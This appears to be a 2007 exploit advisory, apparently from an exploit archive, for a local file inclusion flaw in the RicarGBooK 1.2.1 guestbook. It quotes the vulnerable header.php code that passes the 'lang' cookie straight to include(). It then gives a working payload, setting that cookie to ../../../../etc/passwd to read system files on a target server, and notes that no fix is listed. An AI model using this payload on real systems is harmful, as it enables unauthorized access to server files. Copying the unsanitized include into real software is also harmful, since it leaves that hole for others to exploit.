RicarGBooK 1.2.1 (header.php lang) Local File Inclusion Vulnerability

2007-04-12 00:00:00

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

RicarGBooK 1.2.1

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :

Dj7xpl / Dj7xpl[at]Yahoo[dot]com

* Type :

Local File Inclusion Vulnerabilitiy By Cookie

* Download :

http://ricargbook.adrielmedia.com

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln Code : -=-= Header.php =-=-


if (isset($HTTP_COOKIE_VARS["lang"])) {
$guest_lang = $HTTP_COOKIE_VARS["lang"];
include ('languages/'.$guest_lang);
} else {
$guest_lang = $language;
include ('languages/'.$language);

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Vuln And Example Picture :

Edit Cookie :

Server : http://[Target]
Name : lang
Value : Local File E.g : ../../../../etc/passwd


[X] http://dj7xpl.by.ru/r1.jpg
[X] http://dj7xpl.by.ru/r2.jpg

-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-

# Sp Tnx : str0ke

#

Fixes

No fixes

In order to submit a new fix you need to be registered.